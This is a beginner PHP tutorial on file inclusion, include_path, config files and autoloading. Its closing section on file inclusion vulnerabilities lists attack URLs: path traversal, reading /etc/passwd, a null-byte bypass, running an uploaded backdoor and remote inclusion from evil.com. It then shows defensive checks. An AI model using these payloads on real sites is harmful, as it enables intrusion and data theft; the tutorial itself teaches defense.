PHP for beginners. Including files



Continuing the "PHP for beginners" series, today's article is devoted to how PHP locates and includes files.

What for and why


PHP is a scripting language that was originally created for quickly throwing together home pages (yes, it started out as Personal Home Page Tools), later people began using it to build shops, social networks and other quick hacks that go far beyond that plan, but what am I getting at: the more functionality you code, the stronger the urge to structure it, to get rid of duplicated code, to split it into logical pieces and include them only when needed (it is the same urge you felt while reading this sentence, which could have been split into separate pieces). For this purpose PHP has several functions whose general meaning comes down to including and interpreting a specified file. Let's look at an example of including files:

// file variable.php
$a = 0;

// file increment.php
$a++;

// file index.php
include('variable.php');
include('increment.php');
include('increment.php');
echo $a;

If you run index.php, PHP includes and executes everything in sequence:

$a = 0;
$a++;
$a++;
echo $a; // prints 2

When a file is included, its code runs in the same scope as the line that included it, so every variable available on that line is also available in the included file. Classes and functions declared in the included file end up in the global scope (unless, of course, a namespace is specified for them).

If you include a file inside a function, the included file gets access to the function's scope, so the following code also works:

function a(){
    $a = 0;
    include('increment.php');
    include('increment.php');
    echo $a;
}
a(); // prints 2
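The scope rules above can be checked with a small self-contained sketch. The temporary file and the names `run()` and `declared_in_include()` are made up for the demo; the included file is generated on the fly so that the snippet runs on its own.

```php
<?php
// Hypothetical demo file, generated in the temp directory.
$file = tempnam(sys_get_temp_dir(), 'inc');
file_put_contents($file, implode("\n", [
    '<?php',
    '$counter++;                                             // variable of the including scope',
    'function declared_in_include() { return "global"; }     // lands in the global scope',
]));

function run(string $file): int
{
    $counter = 10;   // local to run()
    include $file;   // the included code sees and changes the local $counter
    return $counter;
}

$counter = 0;                       // global variable with the same name
$local   = run($file);              // 11
$global  = $counter;                // still 0: the include ran in run()'s scope
$visible = declared_in_include();   // callable here although declared during run()

echo "$local $global $visible\n";   // 11 0 global
unlink($file);
```

Note that `run()` is called only once: a second call would include the file again and fail on redeclaring `declared_in_include()`.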

A separate note on the magic constants __DIR__, __FILE__, __LINE__ and others: they are bound to the file in which they are written and are resolved before the inclusion takes place.
Another peculiarity of including files: when a file is included, parsing switches to HTML mode, so any code inside the included file must be enclosed in PHP tags:

<?php
// included code
// ...
?>
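Both remarks, about HTML mode and about magic constants, can be observed in one short sketch. The temporary file is an assumption made so the example is runnable anywhere; output buffering is used only to capture what the included file prints.

```php
<?php
// Hypothetical included file: some text outside the tags, then PHP code.
$file = tempnam(sys_get_temp_dir(), 'inc');
file_put_contents($file, "<p>plain text outside the tags</p>\n<?php return __FILE__;\n");

ob_start();
$reportedFile = include $file;   // value of __FILE__ as seen inside the included file
$output = ob_get_clean();        // everything the included file sent to output

// __FILE__ names the included file (with symlinks resolved), not this script.
$sameFile = ($reportedFile === realpath($file));

echo $output;          // the text outside the PHP tags is passed through as is
var_dump($sameFile);   // bool(true)
unlink($file);
```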

If the file contains only PHP code, the closing tag is usually omitted so that no stray characters accidentally slip in after it, which is fraught with problems (I will tell you more about this in the next article).
Have you ever seen a site consisting of a single 10,000-line file? It brings tears to the eyes (╥_╥) ...
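As for the closing tag, here is a minimal sketch of the problem it can cause. Both files are hypothetical and created in the temp directory; they differ only in whether the closing tag is present before the trailing blank lines.

```php
<?php
$dir = sys_get_temp_dir();
$withTag = tempnam($dir, 'inc');
$withoutTag = tempnam($dir, 'inc');

// Two newlines after the closing tag: PHP swallows the first one, the second is output.
file_put_contents($withTag, "<?php \$loaded = true; ?>\n\n");
// No closing tag: the trailing blank lines are still PHP code and produce nothing.
file_put_contents($withoutTag, "<?php \$loaded = true;\n\n");

ob_start();
include $withTag;
$leaked = ob_get_clean();

ob_start();
include $withoutTag;
$clean = ob_get_clean();

var_dump(strlen($leaked));   // int(1): one stray newline reached the output
var_dump(strlen($clean));    // int(0)

unlink($withTag);
unlink($withoutTag);
```

A single stray character like this is enough to break a later header() call, because output has already started.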

Functions for including files


As mentioned above, PHP has several functions for including files:

  • include - includes and executes the specified file; if the file is not found, it raises a warning (E_WARNING)
  • include_once - same as the function above, but includes the file only once
  • require - includes and executes the specified file; if the file is not found, it raises a fatal error (E_COMPILE_ERROR; since PHP 8.0 it is thrown as an Error exception)
  • require_once - same as the function above, but includes the file only once
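The difference in failure behavior can be sketched as follows. The path is deliberately made up so that the file does not exist, and the try/catch part assumes PHP 8.0 or newer; on older versions the require line would stop the script with a fatal error instead.

```php
<?php
// Hypothetical path that does not exist.
$missing = __DIR__ . '/no-such-file-' . uniqid() . '.php';

// include: raises E_WARNING (silenced here with @), returns false, the script goes on.
$includeResult = @include $missing;
var_dump($includeResult);   // bool(false)

// require: fatal. On PHP 8+ the failure arrives as an \Error that can be caught.
$requireFailed = false;
try {
    @require $missing;
} catch (\Error $e) {
    $requireFailed = true;
}
var_dump($requireFailed);   // bool(true) on PHP 8+
```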

Strictly speaking, these are not functions but special language constructs, so the parentheses can be omitted. There are also other ways to include and execute files, but that is digging deeper; consider it a "bonus task" for yourself ;)
Let's look at the difference between require and require_once using a single file, echo.php:

<p>text of file echo.php</p>

And we will include it several times:

<?php
// includes and executes the file
// returns 1
require_once 'echo.php';
// the file is not included again because it has already been included
// returns true
require_once 'echo.php';
// includes and executes the file
// returns 1
require 'echo.php';

As a result, the file echo.php is included twice:

<p>text of file echo.php</p><p>text of file echo.php</p>

There are a couple of directives that affect inclusion, although you are unlikely to need them: auto_prepend_file and auto_append_file. They let you specify files that are included before the main script runs and after it finishes, respectively. I can't even think of a "real-life" scenario where they would be required.

The task
Do come up with and implement a scenario that uses the auto_prepend_file and auto_append_file directives; they can only be changed in php.ini, .htaccess or httpd.conf (see PHP_INI_PERDIR) :)

Where does PHP look?


PHP searches for included files in the directories listed in the include_path directive. This directive also affects the functions fopen(), file(), readfile() and file_get_contents(). The algorithm is quite simple: PHP checks each directory from include_path in turn until it finds the file; if it finds nothing, it reports an error. To change include_path from a script, use the set_include_path() function.

When setting include_path, keep one important point in mind: Windows and Linux use different path separators, ";" and ":" respectively, so use the PATH_SEPARATOR constant when adding your directory, for example:

// example path on Linux
$path = '/home/dev/library';
// example path on Windows
$path = 'c:\Users\Dev\Library';
// the code that changes include_path is identical on Linux and Windows
set_include_path(get_include_path() . PATH_SEPARATOR . $path);
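To see the lookup in action, here is a small sketch that creates a throwaway "library" directory, appends it to include_path and then includes a file by its bare name. The directory and file names are invented for the demo; stream_resolve_include_path() is used only to show where PHP would find the file.

```php
<?php
// Hypothetical library directory created on the fly.
$library = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'demo-lib-' . uniqid();
$name = 'demo_greeting_' . uniqid() . '.php';
mkdir($library);
file_put_contents($library . DIRECTORY_SEPARATOR . $name, "<?php return 'hello from the library';\n");

$before = stream_resolve_include_path($name);   // false: the directory is not on include_path yet

set_include_path(get_include_path() . PATH_SEPARATOR . $library);

$after = stream_resolve_include_path($name);    // full path inside $library
$greeting = include $name;                      // found through include_path

var_dump($before);
echo $after, "\n", $greeting, "\n";

// Clean up the demo files.
unlink($library . DIRECTORY_SEPARATOR . $name);
rmdir($library);
```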

When you set include_path in the ini file, you can use environment variables such as ${USER}:

include_path = ".:${USER}/my-php-library"

If you specify an absolute path (starting with "/") or a relative one (starting with "." or "..") when including a file, the include_path directive is ignored and the file is looked up only at the specified path.
It might be worth telling you about safe_mode, but that is ancient history (it was removed in PHP 5.4), and I hope you never run into it; if you suddenly do, at least you will know that it once existed and is long gone ...

Using return


Here is a small life hack: if an included file returns something with the return construct, that data can be captured and used, which makes it easy to organize configuration files. An example for clarity:

// file config/db.php
return [
    'host' => 'localhost',
    'user' => 'root',
    'pass' => ''
];

// the including file
$dbConfig = require 'config/db.php';
var_dump($dbConfig);
/*
array(
  'host' => 'localhost',
  'user' => 'root',
  'pass' => ''
)
*/

Interesting facts without which life was just fine: if functions are defined in the included file, they can be used in the main file regardless of whether they were declared before or after the return.
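This fact is easy to verify with a tiny sketch. The temporary file and the function name declared_after_return() are invented for the demo.

```php
<?php
// Hypothetical config file with a function declared after the return statement.
$file = tempnam(sys_get_temp_dir(), 'inc');
file_put_contents($file, implode("\n", [
    '<?php',
    'return ["debug" => true];',
    '// This line is never executed, yet the function is declared when the file is compiled:',
    'function declared_after_return() { return "still available"; }',
]));

$config = require $file;

var_dump($config['debug']);           // bool(true)
echo declared_after_return(), "\n";   // still available
unlink($file);
```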
The task
Write code that assembles the configuration from several folders and files. The file structure is as follows:

config
|-- default
|  |-- db.php
|  |-- debug.php
|  |-- language.php
|  `-- template.php
|-- development
|  `-- db.php
`-- production
   |-- db.php
   `-- language.php

The code must work as follows:

  • if the system environment has a PROJECT_PHP_SERVER variable and it equals development, all files from the default folder must be included and their data stored in the $config variable; then the files from the development folder are included, and their data must overwrite the corresponding items stored in $config
  • the same behavior applies if PROJECT_PHP_SERVER equals production (naturally, only for the production folder)
  • if the variable is missing or set incorrectly, only the files from the default folder are included


Autoloading


Constructs that include files look rather bulky, and keeping them up to date is a chore of its own. Take a look at this piece of code from the example in the article about exceptions:

// load all files w/out autoloader
require_once 'Education/Command/AbstractCommand.php';
require_once 'Education/CommandManager.php';
require_once 'Education/Exception/EducationException.php';
require_once 'Education/Exception/CommandManagerException.php';
require_once 'Education/Exception/IllegalCommandException.php';
require_once 'Education/RequestHelper.php';
require_once 'Education/Front.php';

The first attempt to get rid of such “happiness” was the __autoload function. More precisely, it was not a ready-made function: you had to define it yourself and use it to include the required files by class name. The only rule was that each class lives in a separate file named after the class (i.e. myClass must be in the file myClass.php). Here is an example implementation of __autoload() (taken from the comments in the official manual):

The class that we will load:

// class myClass in a separate file myClass.php
class myClass {
    public function __construct() {
        echo "myClass init'ed successfully!!!";
    }
}

The file that loads this class:

// example implementation
// files are searched for according to the include_path directive
function __autoload($classname) {
    $filename = $classname . ".php";
    include_once $filename;
}
// create an instance of the class
$obj = new myClass();

Now for the problems with this function. Imagine you include third-party code in which someone has already defined __autoload() for their own code, and voila:

Fatal error: Cannot redeclare __autoload()

To avoid this, a function was introduced that registers an arbitrary function or method as a class loader: spl_autoload_register. That is, we can create several class-loading functions with arbitrary names and register them with spl_autoload_register. Now index.php looks like this:

// example implementation
// files are searched for according to the include_path directive
function myAutoload($classname) {
    $filename = $classname . ".php";
    include_once($filename);
}
// register the loader
spl_autoload_register('myAutoload');
// create an instance of the class
$obj = new myClass();
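Since several loaders can be registered, it helps to see how PHP walks through them. In this sketch, the class DemoReport, its temporary file and the $calls log are all hypothetical; the loaders are closures instead of named functions purely for brevity.

```php
<?php
// Hypothetical class file generated in the temp directory.
$classFile = tempnam(sys_get_temp_dir(), 'cls');
file_put_contents($classFile, "<?php class DemoReport {}\n");

$calls = [];

// First loader: knows nothing about the class, only records that it was asked.
spl_autoload_register(function (string $class) use (&$calls): void {
    $calls[] = "first:$class";
});

// Second loader: actually loads DemoReport.
spl_autoload_register(function (string $class) use (&$calls, $classFile): void {
    $calls[] = "second:$class";
    if ($class === 'DemoReport') {
        require $classFile;
    }
});

// Third loader: not reached for DemoReport, because the class already exists by then.
spl_autoload_register(function (string $class) use (&$calls): void {
    $calls[] = "third:$class";
});

$report = new DemoReport();
print_r($calls);   // first:DemoReport, second:DemoReport
unlink($classFile);
```

Loaders are asked in registration order, and the chain stops as soon as one of them has defined the class.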

“Did you know?” corner: the first parameter of spl_autoload_register() is optional. If the function is called without it, spl_autoload is used as the loader; it searches the include_path folders for files with the .php and .inc extensions, and this list can be extended with the spl_autoload_extensions function.
Now every developer can register their own loader; the main thing is that class names do not clash, which should not be a problem if you use namespaces.
Since the more advanced spl_autoload_register() has been around for a long time, __autoload() was deprecated in PHP 7.2 and removed in PHP 8.0 (X_x)
Well, the picture is more or less clear now. Although, wait a minute: registered loaders are queued in the order they were registered, so if someone botched something in their loader, you can get a very unpleasant bug instead of the expected result. To prevent this, smart grown-ups described a standard that lets you plug in third-party libraries without problems, as long as the organization of their classes follows the PSR-0 standard (already about 10 years old) or PSR-4. The essence of the requirements described in these standards:

  1. Each library must live in its own namespace (the so-called vendor namespace)
  2. A separate folder must be created for each namespace
  3. A namespace may contain sub-namespaces, also in separate folders
  4. One class - one file
  5. The file name with the .php extension must exactly match the class name

Example from the manual:

Full class name               | Namespace        | Base directory          | Full path
\Acme\Log\Writer\File_Writer  | Acme\Log\Writer  | ./acme-log-writer/lib/  | ./acme-log-writer/lib/File_Writer.php
\Aura\Web\Response\Status     | Aura\Web         | /path/to/aura-web/src/  | /path/to/aura-web/src/Response/Status.php
\Symfony\Core\Request         | Symfony\Core     | ./vendor/Symfony/Core/  | ./vendor/Symfony/Core/Request.php
\Zend\Acl                     | Zend             | /usr/includes/Zend/     | /usr/includes/Zend/Acl.php


The only differences between the two standards are that PSR-0 supports old code without namespaces (i.e. written for versions before 5.3.0), while PSR-4 is free of this anachronism and also lets you avoid unnecessary folder nesting.
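To make the prefix-to-directory mapping concrete, here is a minimal sketch of a PSR-4 style loader. It is not the reference implementation from the standard: it handles a single prefix, and the Acme\Log\ prefix, the FileWriter class and the temporary directory layout are assumptions made for the demo.

```php
<?php
// Hypothetical package layout created in a temp directory:
//   <base>/Writer/FileWriter.php  ->  class Acme\Log\Writer\FileWriter
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'acme-log-' . uniqid() . DIRECTORY_SEPARATOR;
mkdir($baseDir . 'Writer', 0777, true);
file_put_contents(
    $baseDir . 'Writer' . DIRECTORY_SEPARATOR . 'FileWriter.php',
    "<?php\nnamespace Acme\\Log\\Writer;\nclass FileWriter {}\n"
);

$prefix = 'Acme\\Log\\';   // namespace prefix mapped to $baseDir

spl_autoload_register(function (string $class) use ($prefix, $baseDir): void {
    // Ignore classes that belong to other prefixes.
    if (strncmp($class, $prefix, strlen($prefix)) !== 0) {
        return;
    }
    // Strip the prefix and turn namespace separators into directory separators.
    $relative = substr($class, strlen($prefix));
    $file = $baseDir . str_replace('\\', DIRECTORY_SEPARATOR, $relative) . '.php';
    if (is_file($file)) {
        require $file;
    }
});

$writer = new \Acme\Log\Writer\FileWriter();
echo get_class($writer), "\n";   // Acme\Log\Writer\FileWriter
```

In real projects this mapping is normally generated by a tool rather than written by hand; the sketch only shows what such a loader does with a class name.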

Thanks to these standards, a tool like Composer, the universal package manager for PHP, became possible. If you missed it, there is a good talk by pronskiy about this tool.


PHP injection


I also wanted to tell you about the first mistake of everyone who builds a single entry point for a site in one index.php and calls it an MVC framework:

<?php
$page = $_GET['page'] ?? die('Wrong filename');
if (!is_file($page)) {
    die('Wrong filename');
}
include $page;

You look at this code and feel the urge to pass something malicious to it:

// get unexpected system behavior
http://domain.com/index.php?page=../index.php
// read files in the server directory
http://domain.com/index.php?page=config.ini
// read system files
http://domain.com/index.php?page=/etc/passwd
// run files that we uploaded to the server beforehand
http://domain.com/index.php?page=user/backdoor.php

The first thing that comes to mind is to forcibly append the .php extension, but in some cases this can be bypassed “thanks” to the null byte vulnerability (do read up on it; this vulnerability was fixed long ago, but you may suddenly come across an interpreter older than PHP 5.3, and it is worth knowing for general education anyway):

// read system files
http://domain.com/index.php?page=/etc/passwd%00

In modern versions of PHP, a null byte in the path of an included file immediately causes an inclusion error, even if the specified file exists and could be included. The check looks like this: strlen(Z_STRVAL_P(inc_filename)) != Z_STRLEN_P(inc_filename) (this is from the depths of PHP itself).
The second “worthwhile” idea is to check that the file is located in the current directory:

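<?php
$page = $_GET['page'] ?? die('Wrong filename');
// resolve the very path that will be included, extension and all
$file = realpath($page . '.php');
// realpath() returns false for a missing file; the trailing separator
// keeps sibling directories with the same name prefix from passing the check
if ($file === false || strpos($file, __DIR__ . DIRECTORY_SEPARATOR) !== 0) {
    die('Wrong path to file');
}
include $file;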

The third, but not the last, variation of the check is the open_basedir directive: with it you can specify the directory in which PHP is allowed to look for files to include:

<?php
$page = $_GET['page'] ?? die('Wrong filename');
ini_set('open_basedir', __DIR__);
include $page . '.php';

Be careful: this directive affects not only file inclusion but all work with the file system. When you enable this restriction, make sure you have not left anything outside the specified directory, neither cached data nor user files (although is_uploaded_file() and move_uploaded_file() will keep working with the temporary folder for uploaded files).
What other checks are possible? Plenty of options; it all depends on the architecture of your application.
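One of those options, shown here only as a sketch and not as the approach the article prescribes, is an allow-list: the user-supplied value is never used as a path, only as a key into a fixed map. The function resolvePage() and the pages/ layout are hypothetical.

```php
<?php
/**
 * Maps a user-supplied page name to a file, or returns null.
 * $pages is a hypothetical allow-list: only its keys can ever be included.
 */
function resolvePage(string $requested, array $pages): ?string
{
    return $pages[$requested] ?? null;
}

$pages = [
    'home'    => __DIR__ . '/pages/home.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

var_dump(resolvePage('home', $pages) !== null);       // bool(true)
var_dump(resolvePage('../index', $pages));            // NULL
var_dump(resolvePage('/etc/passwd', $pages));         // NULL
var_dump(resolvePage('http://evil.com/x', $pages));   // NULL

// Possible use in a front controller (commented out so the sketch runs anywhere):
// $file = resolvePage($_GET['page'] ?? 'home', $pages) ?? die('Wrong filename');
// include $file;
```

The price of this approach is that every new page has to be added to the map by hand, which is often acceptable for a small site.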

I also want to mention the “wonderful” allow_url_include directive (it depends on allow_url_fopen): it allows including and executing remote PHP files, which is far more dangerous for your server:

// include a remote PHP script
http://domain.com/index.php?page=http://evil.com/index.php

Seen it, remembered it, and never use it; fortunately it is off by default. You will need this feature slightly less often than never; in all other cases, design a proper application architecture in which the different parts of the application communicate through an API.

The task
Write a script that includes PHP scripts from the current folder by name, keeping the possible vulnerabilities in mind and avoiding blunders.

Finally


This article covers the basic foundations of PHP, so study it carefully, do the tasks and don't slack off; nobody will learn it for you.

PS


This is a repost from the PHP For Beginners series.


If you have comments on the content of the article, or perhaps on its form, describe them in the comments, and we will make this material even better.
